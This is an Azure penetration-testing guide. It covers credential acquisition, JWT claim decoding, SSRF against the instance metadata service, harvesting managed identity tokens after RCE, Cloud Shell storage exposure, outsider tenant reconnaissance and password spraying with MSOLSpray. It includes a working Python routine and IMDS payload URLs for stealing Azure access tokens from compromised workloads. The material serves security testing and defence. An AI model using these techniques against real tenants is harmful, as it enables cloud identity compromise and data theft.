Pentesting Azure applications requires understanding both the platform's security controls and the ways they are commonly misconfigured.
Azure Active Directory (Azure AD, now branded Entra ID) is the identity layer; it provides multi-factor authentication and conditional access. Network security groups (NSGs) and Azure Firewall filter traffic between and into resources and limit lateral movement.
A pentester's job is to find where these controls are absent, bypassable or mis-scoped by simulating realistic attacks against the tenant and the resources it contains, rather than to take their presence as evidence of security.
Pentesting Methodology
To audit an Azure environment you need to know which services are in use, what is exposed to the Internet, who has access to what, and how internal Azure services and external services are connected.
Some of that can be learned from outside without compromising any user in the target tenant (see AD Attack Surface below). To actually compromise the environment, the first step is obtaining credentials for Azure AD.
Common ways to obtain them:
- Leaks in GitHub (or similar) - OSINT
- Social Engineering
- Password reuse (password leaks)
- Vulnerabilities in Azure-Hosted Applications
- 3rd parties breached
- Internal Employee
- Common Phishing (credentials or OAuth App)
- Azure Password Spraying
Once you have credentials, perform basic enumeration to learn which principal they belong to (user, service principal or managed identity), which tenant, and what that principal has access to.
Note that the noisiest part is the login, not the enumeration itself: authenticating with stolen credentials creates sign-in log entries that defenders alert on, whereas the read-only directory and resource enumeration that follows is far less visible.
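The first enumeration step, knowing whom a token belongs to and what it reaches, can be done without any request at all, because an Azure AD access token is a JWT whose claims are readable by anyone holding it. The following is an added example written for this article (not code from any of the cited sources). The token it builds is constructed with a fake signature; only the claim names (tid, oid, upn, aud, scp, roles, exp, idtyp) are the real Azure AD ones, and no signature verification is attempted because the point is to read the token, not to trust it.

```python
"""Read the identity, tenant and permissions out of an Azure AD access token.

Added example: the token is CONSTRUCTED here with a fake signature; the
claim names are the ones Azure AD actually issues.
"""
import base64
import json
import time


def b64url_decode(segment):
    """base64url without padding, as used in JWT segments."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt(token):
    """Return the claims of a compact JWT. The signature is NOT verified:
    this tells you what the token says about its holder, nothing more."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT")
    return json.loads(b64url_decode(parts[1]))


def summarize(token, now=None):
    """The claims that answer 'whose creds are these and what do they reach':
    tenant (tid), principal (upn for users, appid/oid for apps), object id,
    audience (which API the token is for), delegated scopes (scp),
    application roles (roles), and whether it has expired (exp)."""
    c = decode_jwt(token)
    now = time.time() if now is None else now
    return {
        "tenant": c.get("tid"),
        "principal": c.get("upn") or c.get("preferred_username") or c.get("appid") or c.get("oid"),
        "object_id": c.get("oid"),
        "audience": c.get("aud"),
        "scopes": sorted((c.get("scp") or "").split()),
        "roles": sorted(c.get("roles") or []),
        "app_only": c.get("idtyp") == "app",   # app-only tokens carry idtyp=app and no upn
        "expired": c.get("exp", 0) <= now,
    }


# CONSTRUCTED claims for a delegated ARM token; the GUIDs are placeholders.
SAMPLE_CLAIMS = {
    "aud": "https://management.azure.com/",
    "iss": "https://sts.windows.net/11111111-2222-3333-4444-555555555555/",
    "tid": "11111111-2222-3333-4444-555555555555",
    "oid": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
    "upn": "jdoe@contoso.com",
    "scp": "user_impersonation",
    "exp": 1700000000,
}


def build_sample_token():
    """Header + constructed claims + FAKE signature; never accepted by Azure."""
    header = {"typ": "JWT", "alg": "RS256", "kid": "constructed"}
    return ".".join([
        b64url_encode(json.dumps(header).encode()),
        b64url_encode(json.dumps(SAMPLE_CLAIMS).encode()),
        b64url_encode(b"not-a-real-signature"),
    ])


if __name__ == "__main__":
    print(json.dumps(summarize(build_sample_token()), indent=2))
```

Reading the `aud` claim first saves time: a token minted for `https://graph.microsoft.com/` is useless against the ARM API and vice versa, and a token with `scp` but no `roles` is delegated, so it can never exceed the rights of the user named in `upn`.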
Need for Penetration Testing
Azure AD is the identity provider for a large share of corporations, which makes it a prime target for attackers.
Azure is usually deployed as a hybrid: an on-prem Active Directory synchronised to Azure AD. That creates access-control paths in both directions, on-prem to cloud and cloud to on-prem, and an attacker who controls one side will try to cross to the other.
A compromised system in the cloud may hold credentials that are also valid on-prem, giving a path to the on-prem domain controllers with devastating consequences for the company.
A vulnerability in a web application hosted on Azure can likewise put the whole directory at risk, regardless of whether the company treats that application as internal or external.
Azure AD therefore belongs in scope for any penetration test that covers the corporate identity infrastructure.
Azure SSRF Vulnerabilities
If you find an SSRF in a machine hosted inside Azure, check the Azure SSRF page on HackTricks (see Sources) for tricks.
SSRF matters more in the cloud than on-prem because the vulnerable workload can reach endpoints the attacker cannot: on an Azure VM the Instance Metadata Service at http://169.254.169.254/metadata/ returns instance details and, if the VM has a managed identity, OAuth access tokens for Azure APIs.
The caveat is that IMDS only answers requests that carry the header Metadata: true; that header requirement is the designed SSRF mitigation. An SSRF primitive that cannot set request headers will not reach it, while one that can (or a full command execution) turns into cloud credentials.
So when triaging an SSRF on Azure, the first question is not only which internal hosts it reaches but whether it gives control over request headers.
Azure Web Application Vulnerabilities
Applications running on Azure App Service or Azure Functions are often assigned a managed identity, which lets the app obtain access tokens for Azure resources without any credentials in its configuration.
A vulnerability in such an application therefore exposes more than the application: anyone who can make the app's runtime request a token inherits every permission granted to that identity, and a captured access token (the identity's own, or a user's token handled by the app) grants the same access until it expires.
With a command execution vulnerability, check whether the process environment defines the managed identity variables (on App Service and Functions these are IDENTITY_ENDPOINT and IDENTITY_HEADER); if both are present, the application runs with managed identity rights.
A GET to that identity endpoint, passing the IDENTITY_HEADER value in the X-IDENTITY-HEADER request header and the Azure Resource Manager (ARM) audience https://management.azure.com/ as the resource parameter, returns an access token with the managed identity's rights, usable directly against the ARM REST API.
The same token can be loaded into Az PowerShell (Connect-AzAccount accepts an existing bearer token through its -AccessToken parameter) to run authenticated enumeration of subscriptions, resources and role assignments as the managed identity.
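The two token sources above, the App Service identity endpoint reached from command execution and the VM metadata service reached from an SSRF, differ only in the URL and the header that authorises the request. The following is an added example for this article and the SSRF section before it, not code from the cited sources or from Azure. The endpoint names, variables, API versions and headers are the documented Azure ones; the sample token response is constructed, and nothing touches the network unless fetch_token() is called from inside a target.

```python
"""Turn RCE or SSRF on an Azure-hosted workload into an Azure access token.

Added example. Documented facts used:
  * App Service / Functions inject IDENTITY_ENDPOINT and IDENTITY_HEADER;
    GET <endpoint>?resource=...&api-version=2019-08-01 with the header
    X-IDENTITY-HEADER: <IDENTITY_HEADER> returns a token. Older apps used
    MSI_ENDPOINT / MSI_SECRET with header "secret" and api-version 2017-09-01.
  * VMs reach IMDS at http://169.254.169.254/metadata/...; it answers only
    when the request carries "Metadata: true".
The SAMPLE_RESPONSE below is CONSTRUCTED in the shape of a real reply.
"""
import json
import os
import urllib.parse
import urllib.request

IMDS = "http://169.254.169.254/metadata"
ARM = "https://management.azure.com/"      # audience for the ARM REST API
GRAPH = "https://graph.microsoft.com/"     # audience for Microsoft Graph


def detect_managed_identity(env):
    """From an RCE, the environment says whether the app has an identity."""
    if env.get("IDENTITY_ENDPOINT") and env.get("IDENTITY_HEADER"):
        return "app_service"
    if env.get("MSI_ENDPOINT") and env.get("MSI_SECRET"):
        return "app_service_legacy"
    return None          # no platform identity visible; IMDS may still apply on a VM


def token_request(env, resource=ARM):
    """Build (url, headers) for the token request matching the host.
    From an SSRF you cannot read env: pass {} and you get the IMDS request."""
    if env.get("IDENTITY_ENDPOINT") and env.get("IDENTITY_HEADER"):
        q = urllib.parse.urlencode({"resource": resource, "api-version": "2019-08-01"})
        return f"{env['IDENTITY_ENDPOINT']}?{q}", {"X-IDENTITY-HEADER": env["IDENTITY_HEADER"]}
    if env.get("MSI_ENDPOINT") and env.get("MSI_SECRET"):
        q = urllib.parse.urlencode({"resource": resource, "api-version": "2017-09-01"})
        return f"{env['MSI_ENDPOINT']}?{q}", {"secret": env["MSI_SECRET"]}
    q = urllib.parse.urlencode({"resource": resource, "api-version": "2018-02-01"})
    return f"{IMDS}/identity/oauth2/token?{q}", {"Metadata": "true"}


def parse_token_response(body):
    """Both endpoints answer with JSON: access_token, expires_on (epoch, as a
    string), resource, token_type and, for user-assigned identities, client_id."""
    data = json.loads(body)
    return {
        "access_token": data["access_token"],
        "resource": data.get("resource"),
        "expires_on": int(data.get("expires_on", 0)),
        "client_id": data.get("client_id"),
    }


def fetch_token(env=None, resource=ARM, opener=urllib.request.urlopen):
    """Perform the request. Only meaningful when run inside the target."""
    url, headers = token_request(os.environ if env is None else env, resource)
    req = urllib.request.Request(url, headers=headers)
    with opener(req, timeout=5) as resp:
        return parse_token_response(resp.read())


def ssrf_payloads():
    """IMDS URLs to feed an SSRF. They only work if the SSRF lets you add the
    Metadata: true header; a bare URL fetch is refused by design."""
    return {
        "instance": f"{IMDS}/instance?api-version=2021-02-01",
        "token_arm": token_request({}, ARM)[0],
        "token_graph": token_request({}, GRAPH)[0],
    }


# CONSTRUCTED: the shape of a successful identity-endpoint reply.
SAMPLE_RESPONSE = json.dumps({
    "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.constructed.sig",
    "expires_on": "1700000000",
    "resource": ARM,
    "token_type": "Bearer",
})

if __name__ == "__main__":
    print("identity via env:", detect_managed_identity(os.environ))
    for name, url in ssrf_payloads().items():
        print(name, "->", url, "(header Metadata: true)")
    print(parse_token_response(SAMPLE_RESPONSE))
```

Request the Graph audience as well as ARM: a managed identity granted Graph application permissions can read or change directory objects that its ARM role says nothing about, and the two tokens are independent.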
Webshell
Azure Cloud Shell is a browser-based shell (Bash or PowerShell) for managing Azure from a command line.
You open it from the shell icon in portal.azure.com or directly at shell.azure.com.
Cloud Shell persists the user's home directory as a disk image file on an Azure Files share in a storage account selected at first use; that file share is effectively the "disk" of your shell. Anyone with access to that storage account can read or alter the persisted home directory (for example the shell's startup files), so the storage account deserves the same protection as the account that uses the shell.
Azure Cloud Testing
Azure cloud testing differs from traditional penetration testing: the targets are virtual machines, storage accounts, databases, identities and other cloud-hosted resources rather than a network perimeter.
The tester has to work within layers of cloud-provider controls and the provider's rules of engagement, and the techniques are tailored to remote, API-driven services rather than to hosts on a LAN.
Because most of these assets are Internet-facing and reachable from anywhere, the findings concern data exposed to the whole Internet, and the attack techniques evolve as quickly as the cloud services themselves.
Azure Network Security
Securing an Azure environment takes planning. Key recommendations:
- Prioritize assets by risk level, so testing effort goes where a compromise hurts most
- Include Azure Active Directory (AD) in your testing scope; it is the control plane for everything else
- Use a combination of automated and manual testing methods, since scanners miss authorization and identity flaws
- Regularly update and patch all systems to remove known, exploitable vulnerabilities
- Validate the effectiveness of security controls such as NSGs, Azure Firewall and intrusion detection, rather than assuming they work as configured
- Conduct threat modeling for each component to anticipate attacks and strengthen defenses accordingly
External Network
If you expose a web, mobile or API application on Azure, or store data in Blob Storage, those assets are reachable by anyone on the Internet and will be probed.
Applications on Azure Web Services (App Service, Functions) commonly run with a managed identity, so an application-level bug such as RCE or SSRF becomes an Azure identity compromise rather than just an application compromise.
Because most tenants are hybrid, a captured access token can also be the first step toward the on-prem AD environment.
Any corporate user in Azure AD can be phished, and an attacker may steal the user's access token or trick them into consenting to a malicious OAuth app instead of stealing their password.
With that user's rights, the attacker can then establish persistence in Azure AD.
Internal Network
Test the internal side from several vantage points, such as anonymous, company employee and customer, since each profile sees a different attack surface.
Map what rights corporate employees hold in Azure AD, what your on-prem Active Directory users can reach in the cloud, and what cloud identities can reach on-prem.
A password spraying or brute force attack against on-prem accounts can originate from the cloud side (in a hybrid setup the same usernames, and often the same passwords, exist in both), so monitor for that pattern on both sides, not only at the on-prem perimeter.
Internal-network risks to track:
- Password Spraying / Brute Force Attack
Azure Authentication and Authorization
Azure Active Directory (AAD) is the recommended identity and access management solution for Azure applications.
AAD provides multi-factor authentication: users must present two or more factors, typically something they know (a password) and something they have (a phone or hardware token).
Azure supports OpenID Connect (OIDC) for authentication and OAuth 2.0 for authorization; applications authenticate users through these protocols and receive tokens (ID tokens, access tokens and refresh tokens) with which they call protected resources.
Applications integrate with AAD through the Microsoft Authentication Library (MSAL, successor of ADAL), which implements the standard flows: authorization code, device code, client credentials, the username/password flow (resource owner password credentials, ROPC) and, for Azure AD B2C, social identity providers. ROPC deserves a tester's attention: it hands the application the user's password, cannot complete MFA, and is exactly the grant that password-spraying tools abuse.
AD Attack Surface
Azure AD exposes a surprising amount of information to unauthenticated outsiders, and this attack surface is often overlooked.
Reconnaissance can start from nothing more than a company's domain name, such as contoso.com. The public OpenID configuration and user-realm endpoints at login.microsoftonline.com reveal the tenant ID (the GUID that uniquely identifies the Azure AD tenant), whether the domain's authentication is managed in the cloud or federated, and the federation provider if there is one.
Tools such as AADInternals (GitHub) automate this outsider reconnaissance, and related tooling looks for publicly accessible Azure blob storage and connects to it to enumerate its contents; an anonymously readable container can expose confidential information directly.
With these techniques an attacker maps the tenant before sending a single credential, so knowing what your tenant discloses and locking down anonymous blob access are proactive measures worth taking.
Password Spraying
Password spraying tries one or a few common passwords against a large list of Azure AD users, staying below the lockout threshold that a per-account brute force would trip. Each attempt is a sign-in against login.microsoftonline.com, so it appears in the tenant's sign-in logs and counts toward smart lockout.
MSOLSpray is the usual tool. Beyond reporting which username/password pairs are valid, it interprets the AADSTS error codes Azure AD returns to distinguish an invalid password from a non-existent user, a locked or disabled account, an expired password, or valid credentials that are blocked by MFA or conditional access; that is useful information even when no password works.
Defenders should understand the technique too: enforce MFA and smart lockout, alert on failed sign-ins spread thinly across many users from one source, and disable legacy and ROPC authentication where possible, so that a valid password alone does not yield a token.
Sources
- https://cloud.hacktricks.xyz/pentesting-cloud/azure-security
- https://trustnetinc.com/azure-penetration-testing/
- https://www.cobalt.io/blog/azure-ad-pentesting-fundamentals
- https://github.com/PacktPublishing/Penetration-Testing-Azure-for-Ethical-Hackers
- https://pentestmag.com/product/pentest-azure-kubernetes-and-cloud-security-tools/